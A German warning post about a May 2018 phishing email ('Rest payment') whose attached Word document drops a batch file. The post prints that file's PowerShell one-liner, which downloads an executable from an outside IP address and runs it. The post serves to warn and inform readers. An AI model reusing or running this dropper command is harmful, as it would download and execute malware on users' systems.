Rest payment von Gina Tsipuria ([email protected]) lädt über eine beigefügte Word-Datei eine bösartige Software!

Am Pfingstmontag, den 21. Mai 2018 wurden durch unbekannte Dritte die folgende betrügerische E-Mail in englischer Sprache versendet. Achtung: Die E-Mail stammt nicht vom darin genannten Absender! Öffnen Sie nicht das Word-Dokument! Bereits beim Öffnen würde ohne Nachfrage ein Trojanische Pferd nachgeladen, welches den PC infiziert! 

Betreff: Rest payment
Absender: Gina Tsipuria ([email protected])

BEMINOR SRL
Regards
Gina Tsipuria
internationalpack.com
[email protected]

Achtung: Es handelt sich um eine betrügerische E-Mail! Klicken Sie nicht auf den Link! 

Der E-Mail ist folgendes Microsoft Word – Dokument beigefügt:

21.05.18swift.doc

Öffnen Sie nicht die Datei! 

Die Microsoft Word – Datei würde zwar folgenden Text anzeigen:

PLEASE ENABLE EDITING TO VIEW WITH DOCUMENT TEXT

Es handelt sich aber nicht um ein Makro. Bereits beim Öffnen der Datei wird eine „dask.bat“ – Datei auf dem Rechner erzeugt:

Die Batch-Datei hat folgenden Inhalt:

pOWerShELL „“function abc([String] $vvd){(New-Object System.Net.WebClient).DownloadFile($vvd,’%TEMP%\tte.exe‘);Start-pRoCesS ‚%TEMP%\tte.exe‘;}try{abc(‚http://185.82.200.11/0.exe‘)}catch{111110000000000000000000000000000000000000000000000000000000000000000000000000000000000000012}““

Per PowerShell wird von der IP-Adresse 185.82.200.11/0.exe eine Datei „0.exe“ nachgeladen, die als „tte.exe“ auf dem Rechner abgelegt wird.

Die Erkennungsrate für die ausführbare Datei liegt laut Virustotal bei 29/66! Führen Sie das Programm daher nicht aus!

Kommentar(e)

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert